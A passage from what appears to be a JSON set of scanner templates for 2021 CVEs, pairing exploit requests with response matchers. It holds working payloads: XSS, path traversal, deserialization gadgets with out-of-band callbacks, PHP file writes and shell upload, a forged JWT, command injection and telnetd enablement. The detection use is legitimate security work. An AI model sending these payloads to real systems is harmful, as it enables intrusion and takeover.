{{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date=onobw%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3Ez2u4g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, '<script>alert(document.domain)</script>') && contains(body_2, 'contact-form')"],"condition":"and"}]}]},{"id":"CVE-2021-33807","info":{"name":"Cartadis Gespage 8.2.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["NetpDoDomainJoin:"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25099","info":{"name":"WordPress GiveWP <2.17.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=give_checkout_login&form_id=xxxxxx\"><script>alert(document.domain)</script>\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")","contains(body, \"give_user_login\")"],"condition":"and"}]}]},{"id":"CVE-2021-26295","info":{"name":"Apache OFBiz <17.12.06 - Arbitrary Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/SOAPService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<?xml version='1.0' encoding='UTF-8'?>\n<soapenv:Envelope\n  xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n  <soapenv:Header/>\n    <soapenv:Body>\n      <ns1:clearAllEntityCaches xmlns:ns1=\"http://ofbiz.apache.org/service/\">\n          <ns1:cus-obj>{{generate_java_gadget(\"dns\", \"https://{{interactsh-url}}\", \"hex\")}}</ns1:cus-obj>\n      </ns1:clearAllEntityCaches>\n    </soapenv:Body>\n</soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["errorMessage"],"condition":"and"},{"type":"word","part":"header","words":["OFBiz.Visitor="]}]}]},{"id":"CVE-2021-25104","info":{"name":"WordPress Ocean Extra <1.9.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/?step=demo&page=owp_setup&a\"><script>alert(/XSS/)</script>   HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["OceanWP","><script>alert(/XSS/)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26598","info":{"name":"ImpressCMS <1.4.3 - Incorrect Authorization","severity":"medium"},"requests":[{"raw":["GET /misc.php?action=showpopups&type=friend HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36\n","GET /include/findusers.php?token={{token}} HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["last_login","user_regdate","uname"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["REQUEST' value='(.*?)'","REQUEST\" value=\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2021-39141","info":{"name":"XStream 1.4.18  - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n  <unserializable-parents/>\n  <java.util.PriorityQueue>\n    <default>\n      <size>2</size>\n    </default>\n    <int>3</int>\n    <dynamic-proxy>\n      <interface>java.lang.Comparable</interface>\n      <handler class='com.sun.xml.internal.ws.client.sei.SEIStub'>\n        <owner/>\n        <managedObjectManagerClosed>false</managedObjectManagerClosed>\n        <databinding class='com.sun.xml.internal.ws.db.DatabindingImpl'>\n          <stubHandlers>\n            <entry>\n              <method>\n                <class>java.lang.Comparable</class>\n                <name>compareTo</name>\n                <parameter-types>\n                  <class>java.lang.Object</class>\n                </parameter-types>\n              </method>\n              <com.sun.xml.internal.ws.client.sei.StubHandler>\n                <bodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'>\n                  <indices>\n                    <int>0</int>\n                  </indices>\n                  <getters>\n                    <com.sun.xml.internal.ws.client.sei.ValueGetter>PLAIN</com.sun.xml.internal.ws.client.sei.ValueGetter>\n                  </getters>\n                  <accessors>\n                    <com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>\n                      <val_-isJAXBElement>false</val_-isJAXBElement>\n                      <val_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'>\n                        <type>int</type>\n                        <field>\n                          <name>hash</name>\n                          <clazz>java.lang.String</clazz>\n                        </field>\n                      </val_-getter>\n                      <val_-isListType>false</val_-isListType>\n                      <val_-n>\n                        <namespaceURI/>\n                        <localPart>hash</localPart>\n                        <prefix/>\n                      </val_-n>\n                      <val_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'>\n                        <type>java.lang.String</type>\n                        <method>\n                          <class>javax.naming.InitialContext</class>\n                          <name>doLookup</name>\n                          <parameter-types>\n                            <class>java.lang.String</class>\n                          </parameter-types>\n                        </method>\n                      </val_-setter>\n                      <outer-class>\n                        <propertySetters>\n                          <entry>\n                            <string>serialPersistentFields</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>[Ljava.io.ObjectStreamField;</type>\n                              <field>\n                                <name>serialPersistentFields</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>CASE_INSENSITIVE_ORDER</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>java.util.Comparator</type>\n                              <field>\n                                <name>CASE_INSENSITIVE_ORDER</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>serialVersionUID</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>long</type>\n                              <field>\n                                <name>serialVersionUID</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>value</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>[C</type>\n                              <field>\n                                <name>value</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>hash</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>int</type>\n                              <field reference='../../../../../val_-getter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                        </propertySetters>\n                        <propertyGetters>\n                          <entry>\n                            <string>serialPersistentFields</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>[Ljava.io.ObjectStreamField;</type>\n                              <field reference='../../../../propertySetters/entry/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>CASE_INSENSITIVE_ORDER</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>java.util.Comparator</type>\n                              <field reference='../../../../propertySetters/entry[2]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>serialVersionUID</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>long</type>\n                              <field reference='../../../../propertySetters/entry[3]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>value</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>[C</type>\n                              <field reference='../../../../propertySetters/entry[4]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>hash</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter reference='../../../../val_-getter'/>\n                          </entry>\n                        </propertyGetters>\n                        <elementLocalNameCollision>false</elementLocalNameCollision>\n                        <contentClass>java.lang.String</contentClass>\n                        <elementDeclaredTypes/>\n                      </outer-class>\n                    </com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>\n                  </accessors>\n                  <wrapper>java.lang.Object</wrapper>\n                  <bindingContext class='com.sun.xml.internal.ws.db.glassfish.JAXBRIContextWrapper'/>\n                  <dynamicWrapper>false</dynamicWrapper>\n                </bodyBuilder>\n                <isOneWay>false</isOneWay>\n              </com.sun.xml.internal.ws.client.sei.StubHandler>\n            </entry>\n          </stubHandlers>\n          <clientConfig>false</clientConfig>\n        </databinding>\n        <methodHandlers>\n          <entry>\n            <method reference='../../../databinding/stubHandlers/entry/method'/>\n            <com.sun.xml.internal.ws.client.sei.SyncMethodHandler>\n              <owner reference='../../../..'/>\n              <method reference='../../../../databinding/stubHandlers/entry/method'/>\n              <isVoid>false</isVoid>\n              <isOneway>false</isOneway>\n            </com.sun.xml.internal.ws.client.sei.SyncMethodHandler>\n          </entry>\n        </methodHandlers>\n      </handler>\n    </dynamic-proxy>\n    <string>ldap://{{interactsh-url}}/#evil</string>\n  </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-41282","info":{"name":"pfSense - Arbitrary File Write","severity":"high"},"requests":[{"raw":["GET /index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__csrf_magic={{csrf_token}}&usernamefld={{username}}&passwordfld={{password}}&login=\n","GET /diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\\x3c\\x3fphp+var_dump(md5(\\x27CVE-2021-41282\\x27));unlink(__FILE__)\\x3b\\x3f\\x3e/;w+/usr/local/www/test.php%0a%23 HTTP/1.1\nHost: {{Hostname}}\n","GET /test.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, 'c3959e8a43f1b39b0d1255961685a238')","status_code==200"],"condition":"and"}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["(sid:[a-z0-9,;:]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-24291","info":{"name":"WordPress Photo Gallery by 10Web <1.5.69 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1\"%20onmouseover=alert(document.domain)//"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","words":["onmouseover=alert(document.domain)//","wp-content/uploads/photo-gallery"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41291","info":{"name":"ECOA Building Automation System - Directory Traversal Content Disclosure","severity":"high"},"requests":[{"raw":["GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-20323","info":{"name":"Keycloak 10.0.0 - 18.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/auth/realms/master/clients-registrations/default","{{BaseURL}}/auth/realms/master/clients-registrations/openid-connect","{{BaseURL}}/realms/master/clients-registrations/default","{{BaseURL}}/realms/master/clients-registrations/openid-connect"],"body":"{\"Test<img src=x onerror=alert(document.domain)>\":1}","stop-at-first-match":true,"headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unrecognized field \"Test<img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2021-45380","info":{"name":"AppCMS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"\"></script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39320","info":{"name":"WordPress Under Construction <1.19 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php/\"><script>alert(document.domain)</script>/?page=under-construction HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["action=\"/wp-admin/admin.php/\"><script>alert(document.domain)</script>","under-construction"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-4191","info":{"name":"GitLab GraphQL API User Enumeration","severity":"medium"},"requests":[{"raw":["POST /api/graphql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nAccept: */*\nOrigin: {{RootURL}}\nReferer: {{RootURL}}/-/graphql-explorer\n\n{\"query\":\"# Welcome to GraphiQL\\n#\\n# GraphiQL is an in-browser tool for writing, validating, and\\n# testing GraphQL queries.\\n#\\n# Type queries into this side of the screen, and you will see intelligent\\n# typeaheads aware of the current GraphQL type schema and live syntax and\\n# validation errors highlighted within the text.\\n#\\n# GraphQL queries typically start with a \\\"{\\\" character. Lines that starts\\n# with a # are ignored.\\n#\\n# An example GraphQL query might look like:\\n#\\n#     {\\n#       field(arg: \\\"value\\\") {\\n#         subField\\n#       }\\n#     }\\n#\\n# Keyboard shortcuts:\\n#\\n#  Prettify Query:  Shift-Ctrl-P (or press the prettify button above)\\n#\\n#       Run Query:  Ctrl-Enter (or press the play button above)\\n#\\n#   Auto Complete:  Ctrl-Space (or just start typing)\\n#\\n\\n{\\n  users {\\n    nodes {\\n      id\\n      name\\n      username\\n    }\\n  }\\n}\",\"variables\":null,\"operationName\":null}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"data\"","\"users\"","\"nodes\"","\"id\"","gid://"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","json":[".data.users.nodes[].username"]}]}]},{"id":"CVE-2021-39433","info":{"name":"BIQS IT Biqs-drive v1.83 Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/download/index.php?file=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26085","info":{"name":"Atlassian Confluence Server - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<display-name>Confluence</display-name>","com.atlassian.confluence.setup.ConfluenceAppConfig"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21978","info":{"name":"VMware View Planner <4.6 SP1- Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\nAccept: text/html\nReferer: {{BaseURL}}\nConnection: close\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"logfile\"; filename=\"\"\nContent-Type: text/plain\n\nPOC_TEST\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(body) == 28"]},{"type":"word","part":"body","words":["File uploaded successfully."]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32030","info":{"name":"ASUS GT-AC2900 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: asusrouter--\nReferer: {{BaseURL}}\nCookie: asus_token=\\0Invalid; clickedItem_tab=0\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","words":["get_cfg_clientlist","alias","model_name"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21805","info":{"name":"Advantech R-SeeNet 2.4.12 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/ping.php?hostname=|dir"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Ping |dir</title>","bottom.php"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3377","info":{"name":"npm ansi_up v4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /\\u001B]8;;https://interact.sh\"/onmouseover=\"alert(1)\\u0007example\\u001B]8;;\\u0007 HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","words":["sh\"/onmouseover=\"alert(1)\">"]}]}]},{"id":"CVE-2021-37580","info":{"name":"Apache ShenYu Admin JWT - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /dashboardUser HTTP/1.1\nHost: {{Hostname}}\nX-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyTmFtZSI6ImFkbWluIiwiZXhwIjoxNjM3MjY1MTIxfQ.-jjw2bGyQxna5Soe4fLVLaD3gUT5ALTcsvutPQoE2qk\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["query success","\"userName\":\"admin\"","\"code\":200"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44451","info":{"name":"Apache Superset <=1.3.2 - Default Login","severity":"medium"},"requests":[{"raw":["GET /login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf_token={{csrf_token}}&username={{username}}&password={{password}}\n","GET /dashboard/list/ HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"username":["admin"],"password":["admin"]},"attack":"pitchfork","matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["session"]},{"type":"word","part":"body_3","words":["DashboardFilterStateRestApi"]}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["name=\"csrf_token\" type=\"hidden\" value=\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-34643","info":{"name":"WordPress Skaut Bazar <1.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/options-general.php/</script><script>alert(document.domain)</script>/?page=skatubazar_option HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22214","info":{"name":"Gitlab CE/EE 10.5 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/v4/ci/lint?include_merged_yaml=true"],"body":"{\"content\": \"include:\\n  remote: http://127.0.0.1:9100/test.yml\"}\n","headers":{"Content-Type":"application/json"},"host-redirects":true,"max-redirects":3,"matchers":[{"type":"word","part":"body","words":["does not have valid YAML syntax"]}]}]},{"id":"CVE-2021-35250","info":{"name":"SolarWinds Serv-U 15.3 - Directory Traversal","severity":"high"},"requests":[{"raw":["POST /?Command=NOOP&InternalFile=../../../../../../../../../../../../../../Windows/win.ini&NewWebClient=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n/?Command=NOOP\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\\[(font|extension|file)s\\]"]},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-24342","info":{"name":"WordPress JNews Theme <8.0.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/themes/jnews/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Change Log:","JNews -"],"condition":"and"}]},{"raw":["POST /?ajax-request=jnews HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nlang=en_US&cat_id=6\"></script><script>alert(document.domain)</script>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["Content-Type: text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24347","info":{"name":"WordPress SP Project & Document Manager <4.22 - Authenticated Shell Upload","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=sp-client-document-manager-fileview HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryaeBrxrKJzAF0Tgfy\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"cdm_upload_file_field\"\n\n{{nonce}}\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"_wp_http_referer\"\n\n/wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-name\"\n\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"{{randstr}}.pHP\"\nContent-Type: image/svg+xml\n\n<?php\n\necho \"CVE-2021-24347\";\n\n?>\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-notes\"\n\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"sp-cdm-community-upload\"\n\nUpload\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy--\n","GET /wp-content/uploads/sp-client-document-manager/1/{{to_lower(\"{{randstr}}.pHP\")}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_4, \"CVE-2021-24347\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"cdm_upload_file_field\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2021-20031","info":{"name":"SonicWall SonicOS 7.0 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{randstr}}.tld\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["https://{{randstr}}.tld/auth.html","Please be patient as you are being re-directed"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42258","info":{"name":"BillQuick Web Suite SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST / HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\n__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode(\"{{VS}}\")}}&__VIEWSTATEGENERATOR={{url_encode(\"{{VSG}}\")}}&__EVENTVALIDATION={{url_encode(\"{{EV}}\")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96\n"],"matchers":[{"type":"word","part":"body","words":["System.Data.SqlClient.SqlException","Incorrect syntax near","_ACCOUNTLOCKED"],"condition":"and"}],"extractors":[{"type":"xpath","name":"VS","internal":true,"xpath":["/html/body/form/div/input[@id='__VIEWSTATE']"],"attribute":"value"},{"type":"xpath","name":"VSG","internal":true,"xpath":["/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']"],"attribute":"value"},{"type":"xpath","name":"EV","internal":true,"xpath":["/html/body/form/div/input[@id='__EVENTVALIDATION']"],"attribute":"value"}]}]},{"id":"CVE-2021-27519","info":{"name":"FUDForum 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?SQ=0&srch=x\"+onmouseover%3Dalert%281%29+x%3D\"&t=search&btn_submit.x=0&btn_submit.y=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["highlightSearchTerms(\"x\" onmouseover=alert(1) x=\"\");"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28377","info":{"name":"Joomla! ChronoForums 2.0.11 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24510","info":{"name":"WordPress MF Gig Calendar <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=mf_gig_calendar&action=edit&id=\"></script><script>alert(document.domain)</script><\" HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20091","info":{"name":"Buffalo WSR-2533DHPL2 - Configuration File Injection","severity":"high"},"requests":[{"raw":["GET /images/..%2finfo.html HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\n","POST /images/..%2fapply_abstract.cgi HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\nContent-Type: application/x-www-form-urlencoded\n\naction=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode(\"R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\"))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["/Success.htm"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"httoken","group":1,"regex":["base64\\,(.*?)\" border="],"internal":true}]}]},{"id":"CVE-2021-33564","info":{"name":"Ruby Dragonfly <1.4.0 - Remote Code 